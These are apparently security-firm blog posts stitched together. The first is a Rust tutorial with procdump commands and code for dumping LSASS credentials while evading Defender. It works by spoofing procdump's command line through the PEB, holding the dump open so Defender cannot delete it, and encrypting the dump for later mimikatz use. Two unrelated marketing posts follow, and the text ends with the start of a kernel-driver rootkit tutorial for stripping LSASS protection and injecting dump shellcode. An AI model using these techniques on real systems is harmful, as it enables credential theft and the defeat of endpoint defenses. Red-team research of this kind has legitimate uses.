One of the popular methods for dumping LSASS is using the procdump.exe program from the Sysinternals Suite. Something like:

procdump64.exe -accepteula -ma <lsass pid> -o dumpfile.dmp

However, Microsoft is well aware of this method, and it is being tracked along with several other common methods and tools.

https://www.microsoft.com/en-us/security/blog/2022/10/05/detecting-and-preventing-lsass-credential-dumping-attacks/

Now procdump is legitimate software with many use cases, and it is signed by Microsoft. From the Microsoft article on preventing LSASS credential dumping, we can see that it alerts on procdump with the -ma command line flag (which writes a full dump file) targeting the LSASS.exe process. So, what if we start procdump with some ordinary, non-suspicious command line arguments, and then swap them out behind the scenes with our LSASS dumping magic? At the time of writing (December 2023) we can successfully dump LSASS undetected on a fully updated Windows 10 machine. On Windows 11, the technique still works, but the resulting dump file will be detected. The good news is we will be able to safely secure the contents of the file before Defender can get its paws on it.

At a high level, we will:

  1. Start procdump64.exe in a suspended state with ordinary, non-suspicious command line arguments.
  2. Locate the process arguments through the PEB and overwrite them with our LSASS dumping arguments.
  3. Shrink the reported command line length so inspection tools only show the path to procdump64.exe.
  4. Resume the process, read the dump file as it is written, and secure its contents.

We will be using Rust for this. It is a great language for offensive development due to its speed and the difficulty of reversing it. It’s also my favorite programming language.

We will be using the official Windows crate for our WinAPI calls, the fantastic dinvoke_rs for NtAPI calls, and the sysinfo crate to simplify finding the LSASS PID.

Start by creating a new project with:

cargo new proc_noprocdump

We will start off by calling CreateProcessA to start procdump64.exe in a suspended state.
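Roughly, that launch looks like this (a sketch, not the exact code from the project: the benign-looking arguments and paths are placeholders, the calls live inside an unsafe block, and the windows crate signature shown here is for recent versions that return a Result):

use windows::core::PSTR;
use windows::Win32::System::Threading::{
    CreateProcessA, CREATE_NEW_CONSOLE, CREATE_SUSPENDED, PROCESS_INFORMATION, STARTUPINFOA,
};

let si = STARTUPINFOA::default();
let mut pi = PROCESS_INFORMATION::default();

// Ordinary-looking arguments (placeholders); they just need to be longer than the real
// arguments we will swap in later
let mut cmdline = *b"C:\\SysinternalsSuite\\procdump64.exe -n 1 -s 5 notepad.exe C:\\temp\\some_benign_dump_name.dmp\0";

CreateProcessA(
    None,                                   // application name (taken from the command line)
    PSTR(cmdline.as_mut_ptr()),             // mutable command line buffer
    None,                                   // process security attributes
    None,                                   // thread security attributes
    false,                                  // do not inherit handles
    CREATE_SUSPENDED | CREATE_NEW_CONSOLE,  // start suspended, in its own console
    None,                                   // environment
    None,                                   // current directory
    &si,
    &mut pi,
).unwrap();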

A couple of things to note here. First, the non-suspicious arguments we launch with must be longer than what we are replacing them with. Our LSASS dumping arguments will be:

-accepteula -ma <lsass pid> -o test.dmp

So as long as the initial arguments are longer than that, we are good. Next, in addition to CREATE_SUSPENDED, we are also passing the CREATE_NEW_CONSOLE flag. This is to allow our program to continue executing while the dump file is being created. This will be important later.

Next, we will use dinvoke_rs to call NtQueryInformationProcess. This library allows us to dynamically call the function, bypassing any API hooks. It also will not create an entry in the Import Address Table.

The function signature for NtQueryInformationProcess is the following:
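From the Microsoft documentation:

__kernel_entry NTSTATUS NtQueryInformationProcess(
  [in]            HANDLE           ProcessHandle,
  [in]            PROCESSINFOCLASS ProcessInformationClass,
  [out]           PVOID            ProcessInformation,
  [in]            ULONG            ProcessInformationLength,
  [out, optional] PULONG           ReturnLength
);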

We will have to create a function pointer type with the Rust data type equivalents. HANDLE and NTSTATUS we can get from the Windows crate; for the rest we will use comparable Rust data types. We can see the out parameter ProcessInformation has a type of PVOID. In our case it will get filled out as a PROCESS_BASIC_INFORMATION struct, so we will pass a mutable pointer to that type (courtesy of the Windows crate) in our function signature.

The resulting function pointer will look like the following:
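Something along these lines (the alias name is ours; HANDLE, NTSTATUS, and PROCESS_BASIC_INFORMATION all come from the Windows crate):

type NtQueryInformationProcess = unsafe extern "system" fn(
    HANDLE,                          // ProcessHandle
    u32,                             // ProcessInformationClass (0 = ProcessBasicInformation)
    *mut PROCESS_BASIC_INFORMATION,  // ProcessInformation
    u32,                             // ProcessInformationLength
    *mut u32,                        // ReturnLength
) -> NTSTATUS;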

Then we can call the “dynamic_invoke!” macro, giving it the library base address, function name, function pointer, return variable, and our actual NtQueryInformationProcess parameters.
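A sketch of that call, following the pattern from the dinvoke_rs README (variable names are ours, and the exact macro arguments may differ slightly between dinvoke_rs versions):

let ntdll = dinvoke::get_module_base_address("ntdll.dll");

let mut pbi = PROCESS_BASIC_INFORMATION::default();
let mut ret_len: u32 = 0;
let function_ptr: NtQueryInformationProcess;   // the type alias from above
let ret: Option<NTSTATUS>;

dinvoke::dynamic_invoke!(
    ntdll,
    "NtQueryInformationProcess",
    function_ptr,
    ret,
    pi.hProcess,                                             // handle from CreateProcessA
    0u32,                                                    // ProcessBasicInformation
    &mut pbi,
    std::mem::size_of::<PROCESS_BASIC_INFORMATION>() as u32,
    &mut ret_len
);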

This call will fill the PROCESS_BASIC_INFORMATION struct which contains the base address to the PEB (Process Environment Block). The PEB has a field “ProcessParameters” which is what we’re after.

Before we dive into reading the PEB data, I want to talk a bit about types, type casting, references, and pointers, and how that works in Rust.

In so many WinAPI calls, you pass a pointer to the variable that receives the data. For example, let’s look at the function signature for ReadProcessMemory in MSDN and the Windows crate documentation.

We are going to call ReadProcessMemory to read the remote PEB, located at the address in the PebBaseAddress field of the PROCESS_BASIC_INFORMATION struct, into a local PEB variable.

In C you could do something like:

PEB peb = { 0 };
ReadProcessMemory(…, …, &peb, …, …);

Here we declare a variable of type PEB, zero-initialize it, and then pass its address to ReadProcessMemory to fill out the PEB struct.

However, in Rust, the compiler is very strict about types and initialization: there is no NULL that we can assign, and we also can’t just declare the variable and initialize it later. The compiler will yell at us.

Fortunately, the solution is very simple. Most of the types in the Windows crate implement Default, so we can call the default method to get a zero-initialized value of the type.

let peb: PEB = PEB::default();

However, if we look back at the lpbuffer parameter of ReadProcessMemory, it is expecting a type of *mut c_void. This is very common, and most WinAPI calls in Rust will expect this type when dealing with buffers and memory addresses.

We can’t just pass a reference &mut peb to the function when it is expecting a pointer of a different type. The compiler will yell at us.

You may be thinking: can we just cast &mut peb to *mut c_void? Short answer: no. Long answer: yes.

This is where transmute comes in. This function allows us to perform this cast in a “Rust approved” fashion.

We give it the type that we have, and the type that we want, and pass it the data it will operate on.

use std::ffi::c_void;
use std::mem;

let mut peb: PEB = PEB::default();
// transmute is unsafe, so this assumes we are already inside an unsafe block
let peb_c_void: *mut c_void = mem::transmute::<&mut PEB, *mut c_void>(&mut peb);

There are a couple of extra steps we need to transform the data, but that’s one of the headaches (ahem, joys) of Rust 😊.

Getting back on track, now we will make two calls to ReadProcessMemory. The first will be to fill out our peb variable. The second will be to read the ProcessParameters field in the PEB.
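Sketched out, the two reads look something like this (pi, pbi, and peb_c_void come from the earlier snippets; recent versions of the windows crate return a Result from ReadProcessMemory):

// First read: fill our local PEB from the remote PebBaseAddress
ReadProcessMemory(
    pi.hProcess,
    pbi.PebBaseAddress as *const c_void,
    peb_c_void,                                   // the *mut c_void we transmuted earlier
    std::mem::size_of::<PEB>(),
    None,
).unwrap();

// Second read: fill a local RTL_USER_PROCESS_PARAMETERS from peb.ProcessParameters
let mut params = RTL_USER_PROCESS_PARAMETERS::default();
ReadProcessMemory(
    pi.hProcess,
    peb.ProcessParameters as *const c_void,
    &mut params as *mut RTL_USER_PROCESS_PARAMETERS as *mut c_void,
    std::mem::size_of::<RTL_USER_PROCESS_PARAMETERS>(),
    None,
).unwrap();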

Now if we run it, we can see the memory address where our arguments are. If we attach a debugger to procdump64.exe and go to that address, we can confirm that it is the start of our arguments.

Now we need to create our argument string and write it to memory. If we look at the definition of RTL_USER_PROCESS_PARAMETERS, we see the CommandLine field is of type UNICODE_STRING.

The Rust type definition for UNICODE_STRING is as follows:
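In the Windows crate it is defined like this:

#[repr(C)]
pub struct UNICODE_STRING {
    pub Length: u16,        // length of the string in bytes (not characters)
    pub MaximumLength: u16, // total size of the buffer in bytes
    pub Buffer: PWSTR,      // pointer to the wide-character buffer
}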

Since we are dealing with UNICODE and PWSTR, these are all going to be wide-char strings; in Rust we will use u16. We will get the PID of LSASS with the sysinfo crate, create our string, and encode it as UTF-16. I mentioned in the beginning that the original arguments need to be longer than the LSASS dump arguments. After we create our new argument string, we will check the length, and if it’s shorter than the original, we will pad the end with 0’s so they are the same length. Then we will call WriteProcessMemory to replace the original arguments with our new ones.
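Something like the following (a sketch: original_len is the length, in u16 units, of the arguments we launched with, and the dump arguments mirror the ones shown earlier):

// Build the real arguments
let lsass_pid = get_pid();
let new_args = format!(
    "C:\\SysinternalsSuite\\procdump64.exe -accepteula -ma {} -o test.dmp",
    lsass_pid
);
let mut new_args_utf16: Vec<u16> = new_args.encode_utf16().collect();

// Pad with 0's so we fully overwrite the longer original argument string
while new_args_utf16.len() < original_len {
    new_args_utf16.push(0);
}

// Overwrite the remote command line buffer in place
WriteProcessMemory(
    pi.hProcess,
    params.CommandLine.Buffer.0 as *const c_void,
    new_args_utf16.as_ptr() as *const c_void,
    new_args_utf16.len() * std::mem::size_of::<u16>(),
    None,
).unwrap();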

Here is our get_pid() function to get the LSASS PID.
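A minimal version of it looks something like this (sysinfo’s API shifts a bit between releases; older versions also need the SystemExt and ProcessExt traits in scope):

use sysinfo::System;

fn get_pid() -> u32 {
    let sys = System::new_all();   // enumerates processes up front
    for (pid, process) in sys.processes() {
        if process.name().eq_ignore_ascii_case("lsass.exe") {
            return pid.as_u32();
        }
    }
    panic!("[-] Unable to find lsass.exe");
}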

Excellent, so now if we inspect the arguments, we can see they have been replaced with our LSASS dumping arguments.

The only caveat with this is that inspecting the process with something like procexp64.exe will show the new arguments.

Let’s fix that.

Looking back at the CommandLine field, we know that the buffer is a UNICODE_STRING. This type has three fields: Length, MaximumLength, and Buffer. We need to find the offset to the Length field, and update that value to be the length of just our call to C:\SysinternalsSuite\procdump64.exe.

We already have a pointer to our ProcessParameters variable where we wrote our arguments. So, we can use that to access the CommandLine field and cast it to a UNICODE_STRING pointer. Then we will get the offset by subtracting our ProcessParameters pointer from our UNICODE_STRING pointer. Lastly, we will add this offset to our peb.ProcessParameters variable, which should give us the address of the Length field.

Inspecting the address with a debugger shows 92 in hex, which matches our length of 146 in decimal.

We get the length of our call to C:\SysinternalsSuite\procdump64.exe, multiply it by the size of the u16 type (since we are dealing with Unicode), and call WriteProcessMemory to update the value.
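Putting that together (a sketch, reusing params, peb, and pi from earlier):

// Offset of CommandLine (and therefore of its Length field) within RTL_USER_PROCESS_PARAMETERS
let offset = &params.CommandLine as *const UNICODE_STRING as usize
    - &params as *const RTL_USER_PROCESS_PARAMETERS as usize;
let remote_length_addr = peb.ProcessParameters as usize + offset;

// New Length in bytes: just the visible path to procdump64.exe, in UTF-16
let visible = "C:\\SysinternalsSuite\\procdump64.exe";
let new_len: u16 = (visible.encode_utf16().count() * std::mem::size_of::<u16>()) as u16;

WriteProcessMemory(
    pi.hProcess,
    remote_length_addr as *const c_void,
    &new_len as *const u16 as *const c_void,
    std::mem::size_of::<u16>(),
    None,
).unwrap();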

Looking at the address again, we see the length field is now 70.

If we look at procdump64.exe now with procexp64, we can see that the LSASS dumping arguments are no longer there.

At this point we can resume the thread and call it a day. We have a capable payload that will dump LSASS on a fully updated Windows 10 machine without Defender batting an eye.
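Resuming is a single call on the thread handle we got back from CreateProcessA:

ResumeThread(pi.hThread);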

To have this succeed on Windows 11, we have a little more work to do. I should clarify - running this will succeed on Windows 11 and the dump file will get created, however it will get detected by Defender once it’s finished and Defender will delete it.

To overcome this, my thought was that we can read the file as it’s getting written to by procdump and write the contents into a buffer that we can use later on.

This is where kicking off procdump in a new console window is helpful, because our program can keep running. While procdump is doing its thing, we will wait for the dump file to exist by repeatedly trying to open a handle to it and checking whether we get an error. We will run this in a while loop so that it keeps checking until the dump file is first created by procdump.
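Something along these lines (the dump path is a placeholder):

let dump_path = "C:\\Users\\Public\\test.dmp";   // wherever procdump will write the dump
while std::fs::File::open(dump_path).is_err() {
    std::thread::sleep(std::time::Duration::from_millis(100));
}
println!("[+] Dump file exists");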

Next, we will use the Tokio asynchronous runtime to open a handle to the file. We will use a tokio Interval to read the file every 500 milliseconds and write the contents to a byte vector. We will do this with the read_to_end method, which returns the number of bytes read and appends the file content to the byte vector. We will keep track of this number and use the seek function to jump to the new portion of the file on each iteration.
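A sketch of that loop (paths and timing are illustrative; this assumes we are inside a Tokio runtime and that tokio is built with the fs, io-util, and time features):

use std::io::SeekFrom;
use tokio::fs::File;
use tokio::io::{AsyncReadExt, AsyncSeekExt};
use tokio::time::{interval, Duration};

async fn read_dump(path: &str) -> Vec<u8> {
    // Holding this handle open is also what stops Defender from deleting the file later
    let mut file = File::open(path).await.unwrap();
    let mut contents: Vec<u8> = Vec::new();
    let mut total_read: u64 = 0;
    let mut ticker = interval(Duration::from_millis(500));

    // Give procdump a generous window (roughly a minute) to finish writing
    for _ in 0..120 {
        ticker.tick().await;
        file.seek(SeekFrom::Start(total_read)).await.unwrap();
        let n = file.read_to_end(&mut contents).await.unwrap();
        total_read += n as u64;
        println!("[*] Read {} new bytes ({} total)", n, total_read);
    }
    contents
}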

While testing this, I found that procdump does not write to the file consistently; it writes the data in two big chunks. So, we can’t just wait until the buffer stops growing. Instead, we’ll just give it a minute or so to write all the contents. There is probably a better way to do it, but meh, it’s fine.

Here is our code from resuming the thread to reading the dump file. Notice I set the file path so that the dump is not written to my noscan folder, which is excluded from Defender. I am also running our proc_noprocdump.exe file from my Desktop. So now we are fully under Defender’s microscope.

Also, a friendly PSA to remind you to turn Automatic sample submission off to keep Microsoft’s grubby paws off your tooling.

When we run it and procdump is creating the dump file, we can see the data being written to the file in two chunks as our count increases.

Funny enough, procdump finishes while our loop is still running, and Defender flags the dump file. However, because we have an open handle to the test.dmp file, Defender is not able to delete it.

Now that we have the LSASS dump file contents safely in memory, we can do with it what we wish. For example, POST it to a web server to extract the contents offline, or encrypt it and write it back to the machine so that you can take it offline and decrypt later.

We will go with the latter.

For our example we will just encrypt the data with RC4 and write it to a file.
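Here is a minimal sketch of that step (the RC4 routine is written out by hand so there are no extra dependencies; the key and output path are placeholders):

use std::fs;

fn rc4(key: &[u8], data: &mut [u8]) {
    // Key-scheduling algorithm (KSA)
    let mut s: [u8; 256] = [0u8; 256];
    for i in 0..256 {
        s[i] = i as u8;
    }
    let mut j: usize = 0;
    for i in 0..256 {
        j = (j + s[i] as usize + key[i % key.len()] as usize) % 256;
        s.swap(i, j);
    }

    // Pseudo-random generation algorithm (PRGA): XOR the keystream over the data in place
    let (mut i, mut j) = (0usize, 0usize);
    for byte in data.iter_mut() {
        i = (i + 1) % 256;
        j = (j + s[i] as usize) % 256;
        s.swap(i, j);
        *byte ^= s[(s[i] as usize + s[j] as usize) % 256];
    }
}

// dump_bytes is the byte vector we filled while procdump was writing the file
rc4(b"SuperSecretKey", &mut dump_bytes);                         // placeholder key
fs::write("C:\\Users\\Public\\lsass.enc", &dump_bytes).unwrap(); // placeholder output path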

When we run it, it will save our encrypted LSASS dump file. Now we don’t have to worry about Defender detecting it! We can just take it offline later to decrypt and feed into mimikatz.

This is a rough PoC that has lots of room for improvement. Some cool optimizations would be encrypting our command line arguments string with a library like litcrypt, downloading procdump from a remote webserver or including it in the binary, and not having to hard code all the file paths.

Ideally, we would not be triggering Defender at all, but at least we are able to achieve the same result, which is getting the LSASS dump file.

Full source code is available here:

https://github.com/djackreuter/proc_noprocdump

Thanks for reading!

The recent 20th Anniversary of IT Summit was an eye-opener for tech enthusiasts, security professionals, and business leaders alike. This annual two-day event brings together IT leaders from across the country to learn about the latest strategies and challenges in the infrastructure, data center, and InfoSec communities.

This year’s discussions revolved around the evolving landscape of business applications and data center access. This evolution is driven by the need to adapt to a rapidly changing digital world, characterized by increasing cyber threats and the demand for enhanced security. A few key themes were hot topics this year including identity-based access, leveraging the zero-trust model, the use of xDR API-enabled security ecosystems, and the integration of automation and AIOps for self-healing security, network, data center and public cloud infrastructure.

Here are our top takeaways from our industry visionaries on each topic:

Identity-Based Access

Traditionally, security systems have focused on network-based or perimeter-based defenses. As remote work and cloud services have become the norm, identity-based access is gaining importance. This approach ensures that only authorized users can access critical systems and data, regardless of their location.

Leveraging the Zero-Trust Model

In a zero-trust environment, trust is never assumed, and verification is a constant process. This model provides a higher level of security by continuously verifying the identity and security posture of every user and device attempting to access resources. By adopting the zero-trust model, organizations can enhance their security and protect against both external and internal threats.

xDR API-Enabled Security Ecosystem

This approach emphasizes data context sharing and enrichment, allowing security solutions to work in synergy. By integrating various security tools through APIs, organizations can enhance threat detection and response capabilities. This holistic approach to security is vital in a world where cyber threats are constantly evolving.

Automation and AIOps

Instead of relying on static security infrastructure responses, organizations are moving towards dynamic, self-healing responses. AIOps (Artificial Intelligence for IT Operations) allows for real-time threat detection and response, reducing the human intervention required for security operations. Automation ensures that security systems can adapt to emerging threats with agility and precision.

Intent and Narrow Focus

To achieve success in network and security infrastructure automation and AIOps initiatives, it's crucial to have a clear intent and a "narrow focus". In other words, organizations need to set specific goals and identify the data points that provide the necessary visibility. This requires upgrading infrastructure to collect and correlate these data points. High-fidelity input and data points are essential for effective security.

Quantifying Cyber Investments

InfoSec programs have evolved over the years, starting from technical controls investments to compliance and risk-based controls investments. The current focus is on data-driven investments based on financial exposure and annual expected losses, ensuring that investments align with risk tolerance and financial objectives.

How SynerComm Can Help

SynerComm's One Strategic Security Plan (OneSSP™) offers a comprehensive range of services to support organizations on their security maturity journey. We collaborate with IT teams to identify their security needs, develop a unique path forward, and provide both the necessary solutions and expertise.

INSIGHTS Express and Enterprise offers tailored assessments, risk analysis, and financial impact evaluations to help organizations understand their current security posture and plan for improvements with a clear return on investment.

Our team also offers application assessments, penetration testing, adversary simulations, and continuous penetration testing to test and fine-tune security controls. Our technology sourcing expertise optimizes network and security infrastructure design, deployment, and ongoing operations, ensuring cost-effective and efficient solutions.

The 2023 IT Summit shed light on the critical shifts in business application and data center access, driven by identity-based access, xDR API-enabled security ecosystems, and more. As the digital landscape continues to evolve, organizations must adapt and prioritize security to protect assets and stay competitive. Our range of services and expertise can assist you in navigating this evolving landscape and enhancing your cybersecurity defenses. Connect with our team to get started today.

In today's increasingly digital world, the aviation industry is more reliant on technology than ever before. As aviation systems become more connected and dependent on the internet, the risk of cyber threats to airlines and airports has grown significantly. In recognition of this evolving threat landscape, the Transportation Security Administration (TSA) has recently issued a set of new cybersecurity requirements for airports and aircraft. Probably not surprising, the TSA's latest cybersecurity directives emphasize the importance of penetration testing and continuous security monitoring.

TSA's New Cybersecurity Requirements

The TSA's press release, dated March 7, 2023, outlines the key components of their new cybersecurity requirements for the aviation sector. These requirements aim to bolster the cybersecurity posture of airlines and airports to safeguard critical systems and passenger data. Some of the key highlights include:

  1. Threat Assessment: Airlines and airports are now required to conduct comprehensive threat assessments to identify potential vulnerabilities and threat actors. This proactive approach helps in understanding the specific risks that an organization may face.
  2. Network Security: Enhanced network security measures, including the implementation of intrusion detection systems (IDS) and intrusion prevention systems (IPS), are mandated to detect and mitigate threats in real-time.
  3. Security Awareness Training: TSA requires all aviation personnel to undergo cybersecurity awareness training to recognize and respond to potential threats effectively.
  4. Incident Response Plans: Airlines and airports must establish and maintain robust incident response plans that outline procedures for reporting, assessing, and responding to cybersecurity incidents.
  5. Vendor and Supply Chain Security: Improved vendor and supply chain security is encouraged to ensure that third-party components do not introduce vulnerabilities into an organization's systems.
  6. Cybersecurity Audits: Frequent cybersecurity audits are to be conducted to evaluate the effectiveness of security measures and identify areas for improvement.

Importance of Penetration Testing

Penetration testing, also known as pentesting, is a crucial component of the TSA's new cybersecurity requirements. It involves simulated cyberattacks on an organization's systems to evaluate their security posture and identify vulnerabilities. The importance of penetration testing can be summarized as follows:

  1. Identifying Vulnerabilities: Penetration testing helps organizations pinpoint weaknesses in their systems that may otherwise go undetected. By simulating real-world attacks, vulnerabilities can be discovered and addressed before malicious actors exploit them.
  2. Control Testing & Validation: Pentesting mimics the tactics, techniques, and procedures used by cybercriminals, providing organizations with a realistic assessment of their security defenses.
  3. Risk Mitigation: By proactively addressing vulnerabilities, penetration testing reduces the risk of successful cyberattacks, safeguarding sensitive information and critical systems.
  4. Compliance: Many regulatory frameworks, including the TSA's new cybersecurity requirements, mandate regular penetration testing as a part of security best practices.

Continuous Security Monitoring

In the ever-evolving landscape of cybersecurity threats, continuous security monitoring is vital. This practice involves the constant surveillance of an organization's network and systems to detect and respond to potential threats in real-time. The significance of continuous security monitoring includes:

  1. Rapid Threat Detection: Continual monitoring allows for the immediate detection of suspicious activities or anomalies, minimizing the time cyber threats can go undetected.
  2. Incident Response: With continuous monitoring in place, organizations can respond swiftly to incidents, reducing potential damage and recovery time.
  3. Compliance Adherence: Many regulatory requirements, including the TSA's, mandate continuous security monitoring to ensure organizations remain in compliance with evolving security standards.
  4. Adaptive Security: The ever-changing threat landscape demands a dynamic and adaptive security approach. Continuous monitoring enables organizations to adapt and respond to new threats as they emerge.

tldr;

The TSA's new cybersecurity requirements for airlines and airports underscore the critical importance of staying ahead of the evolving threat landscape. Penetration testing and continuous attack surface management play pivotal roles in ensuring the safety and security of aviation systems and passengers.

In a world where the aviation industry is more interconnected and dependent on technology than ever before, organizations must embrace these practices to proactively identify vulnerabilities, respond to threats, and safeguard their critical systems. Compliance with these requirements is not just about adhering to regulations; it's about preserving the trust and safety of the flying public. Penetration testing and continuous security monitoring are not just checkboxes on a list; they are the keys to a safer, more secure aviation industry in the digital age.

In my last blog post, I discussed one method of dumping LSASS where we created a DLL that we injected into Task Manager. We could then create an LSASS dump from Task Manager, and the DLL would hook the API calls responsible for creating the file and change the filename to something else. This allowed us to create an LSASS dump file and it was sufficient to bypass Windows Defender. If you missed that blog post, you can read it here. That research was done on a fully updated Windows 11 machine back in April of 2023.

However, in the ever-evolving security world, Microsoft has introduced new protections on LSASS that prevent us from being able to create an LSASS dump. Even when running as NT AUTHORITY\SYSTEM, we are getting an Access Denied error.

In this blog post, we will circumvent these new protections to dump LSASS by creating a rootkit that will change the process protections of both LSASS and our process. We will then inject shellcode that performs the minidump of LSASS into another protected process to thwart AV.

I love Rust and it is my go-to language for all things malware development; however, I think some things are a bit easier to do in C/C++. Kernel drivers being one of them. We will write the kernel driver in C++ and the client that interacts with it in Rust.

I highly recommend the book Windows Kernel Programming by Pavel Yosifovich. It was an invaluable resource in learning about driver development.

To not take up too much time going over the prerequisites, make sure you have Rust installed, and see this link for setting up Visual Studio for driver development.

https://learn.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk

For context, I am doing the development on my Windows 11 host machine and testing on a Windows 11 VM.

Now, we are not going to focus so much on the finer points of the driver code. The main focus will be on the implementation, how we can change the process protections, and subsequently inject our minidump shellcode. I will cover the necessary points in the driver code, but for more details I will refer you to the Windows Kernel Programming book.

At a high level, our driver will create a symbolic link that we can use to open a handle to it from our client application in user-mode. We will pass the process ids of LSASS and our client to the driver through a struct. The driver will then operate on those process ids to change the protections of both processes. Once that’s done, our client will be able to open a handle to a protected process and inject shellcode into it that will perform the LSASS dump.

Process Protections

System-protected processes are a security feature implemented in the Windows kernel to protect certain processes on the system from attacks. When a process runs as a system-protected process, it only allows trusted, signed code to load into the protected process. This ensures that only authorized and trusted applications have access to these system-protected processes. This is the reason our LSASS dump now fails, and the reason you can’t simply terminate an anti-virus process running on the system.

There are two types of protections: Protected Process (PP) and Protected Process Light (PPL). There is also a Signer field which influences the overall protection level. This is determined by the Extended Key Usage (EKU) field in the file’s digital signature.

The three process protection types we are interested in are PS_PROTECTION, PS_PROTECTED_TYPE, and PS_PROTECTED_SIGNER. They are documented here.

The combination of the Protected Type and Protected Signer values are used to create the process protection value. E.g., a protection type of PsProtectedTypeProtected (2) and a protected signer of PsProtectedSignerWinTcb (6) gives us a protection level of 0x62.
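To make the arithmetic concrete (illustrative only, mirroring the PS_PROTECTION bit layout: Type in bits 0-2, Audit in bit 3, Signer in bits 4-7):

let protected_type: u8 = 2;    // PsProtectedTypeProtected
let signer: u8 = 6;            // PsProtectedSignerWinTcb
let protection_level = (signer << 4) | protected_type;
assert_eq!(protection_level, 0x62);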

The protection level of a process lives in the EPROCESS struct. According to MSDN it is “an opaque struct that serves as the process object for a process.”

With the kernel debugger attached, we can view the EPROCESS struct members in WinDbg with the following command:

dt nt!_EPROCESS

The three fields we are interested in are Protection, SignatureLevel, and SectionSignatureLevel.

We cannot access these fields directly like EPROCESS->Protection. Instead we can call PsLookupProcessByProcessId which returns a pointer to the EPROCESS struct of the specified process. After that we will use the offset to access the fields we need. We can look at the field’s values in WinDbg like so:

First, get the process address:
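For example, something like:

!process 0 0 lsass.exe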

Then you can access fields in the EPROCESS struct.
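For example, something like (using the address returned above):

dt nt!_EPROCESS <process address> Protection

and the same for SignatureLevel and SectionSignatureLevel.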

Current LSASS Protections

As you saw previously, trying to create a dump file of LSASS fails even when running as NT AUTHORITY\SYSTEM. What’s interesting is that if we look at the LSASS process with Process Hacker, it shows a protection level of none.

If we use ProcExp64 to inspect the LSASS process, we can see it has a protection level of PsProtectedSignerNone.

This protection level on LSASS is new and was not present on Windows 10.

Now what’s puzzling is, as we can see in WinDbg, it has a protection level of 0x08, but all other flags are set to 0 except for Audit.

Even SignatureLevel and SectionSignatureLevel are 0.

Given what we know about how the protection level is calculated, it doesn’t quite make sense. Unfortunately, there is not a lot of official documentation on these protections to give us additional details. Additionally, Audit is a reserved field, which adds to the ambiguity.

Nevertheless, we will be setting all these fields to 0, which does the trick and will let us dump LSASS, which is really what we are after.

Now for creating the driver. We will create a new project in Visual Studio of type Empty WDM Driver. We will then create a DriverEntry function like so.

DriverEntry is the entry point for the driver. It is like the equivalent of “main” in a user-mode application. The parameters of this function are a DriverObject and a RegistryPath. Since we are not using RegistryPath, we will use the macro UNREFERENCED_PARAMETER to avoid compilation issues.

Next, we set the DriverUnload function, which undoes everything we do in DriverEntry to clean up after ourselves and avoid any memory leaks. We also set the MajorFunctions we need. IRP_MJ_CREATE and IRP_MJ_CLOSE are needed so we can open and close a handle to the driver, and IRP_MJ_DEVICE_CONTROL is what we will call from user-mode to change the protections. In the rest of the DriverEntry function, we create a DeviceObject and a symbolic link, which is what we will access from user-mode to open a handle to the driver.

We will also create another file, LvlChg.h, that contains some definitions that are typically shared between the kernel driver and user-mode agent. Since we are writing the client in Rust, we will create these definitions in both C++ and Rust.

Here we are creating the device. You can name it whatever you like; Microsoft’s documentation specifies that device type values for third-party drivers begin at 0x8000, so that’s what we’ll use. Then we create the control code. Because you can define multiple functions, the control code is used to determine which driver function you are trying to call from user-mode.

Last, we have a struct containing process IDs that we will be passing from user-mode. The process ID of our client that we will use to add protections, and the process ID of our target which is LSASS.

Now let’s jump into some Rust and start creating our client. First, we will create a new Rust project with

cargo new lvlchg_client

You can name it whatever you like. One of the reasons I love Rust is that it has full support for the Win32 API straight from Microsoft. There are other crates that offer Win32 support, but I strongly prefer the one from Microsoft so that’s what we’ll use.

The first thing we will do, before the main function, is create the process IDs struct and recreate the CTL_CODE macro, which does not exist in the windows-rs crate.
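A sketch of those definitions (names, types, and values here are illustrative and must mirror whatever the driver header defines):

// Mirrors the definitions in LvlChg.h
const DEVICE_LVLCHG: u32 = 0x8000;   // third-party device types start at 0x8000
const METHOD_BUFFERED: u32 = 0;
const FILE_ANY_ACCESS: u32 = 0;

#[repr(C)]
struct ProcessIds {
    client_pid: u32,   // our process, to be protected
    target_pid: u32,   // LSASS, to be unprotected
}

// The windows crate does not expose CTL_CODE, so we recreate it
macro_rules! ctl_code {
    ($device_type:expr, $function:expr, $method:expr, $access:expr) => {
        (($device_type) << 16) | (($access) << 14) | (($function) << 2) | ($method)
    };
}

const IOCTL_LVLCHG_PROTECT: u32 = ctl_code!(DEVICE_LVLCHG, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS);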

Next, we will get the PID of the process we want to inject the minidump shellcode into. This will be the PID of another protected process.

We will also create some constant variables with some of the definitions we will use when creating the device and control code.

After that, we can open a handle to our driver with CreateFileA. Note that the file name is the name of the symbolic link we created in the driver.

Next, we will write a little function to get the process ID of LSASS using the sysinfo crate.

See how much easier that is in Rust 😉. We will then populate the Process ID struct with the LSASS PID and the PID of the client. Then we’ll call DeviceIoControl and pass it the handle to the driver, specify the control code, and pass it the Process ID struct. This function invokes the IRP_MJ_DEVICE_CONTROL major function in the kernel driver.
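Roughly (a sketch: driver_handle is the handle from CreateFileA, lsass_pid comes from the helper above, and recent windows crate versions return a Result here):

let ids = ProcessIds {
    client_pid: std::process::id(),   // our own PID, to be protected
    target_pid: lsass_pid,            // the LSASS PID, to be unprotected
};
let mut bytes_returned: u32 = 0;

DeviceIoControl(
    driver_handle,                     // handle opened on the driver's symbolic link
    IOCTL_LVLCHG_PROTECT,              // control code built with the ctl_code! macro above
    Some(&ids as *const ProcessIds as *const c_void),
    std::mem::size_of::<ProcessIds>() as u32,
    None,                              // no output buffer
    0,
    Some(&mut bytes_returned),
    None,                              // not using overlapped I/O
).unwrap();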

Back in the kernel code, we are doing some input validation checks and casting the input buffer to a Process ID struct. We then look up the Windows version we are on and get the offset (more on this in a moment) before calling the function that changes the process protections.

Now for changing the process protections. We are calling PsLookupProcessByProcessId to get a pointer to an EPROCESS struct. From there, we add the offset for the Windows version we are on to get the process protection information. Once we have that, we are setting the protection level to 0 across the board for LSASS and adding a protection level of PsProtectedWinTcb for our client process.

Now back to the Windows offset…

Different versions of Windows have the struct values we need at different offsets. This means that we cannot just access EPROCESS->SignatureLevel directly, but rather need to add the offset for the Windows version we are targeting to get the correct value. Fortunately, there are known offsets that we can use to be sure we get the correct value.

We can create an enum with the Windows versions we want to support and the offset for that version as the value.

We know the offset to use for each version, and we can look up the build number with RtlGetVersion. We can then look up the Windows 10 and Windows 11 version tables to match the build number to the version. Dynamically looking up the Windows version and finding the proper offset ensures that we don’t need to recompile the driver every time we want to target a different Windows version.

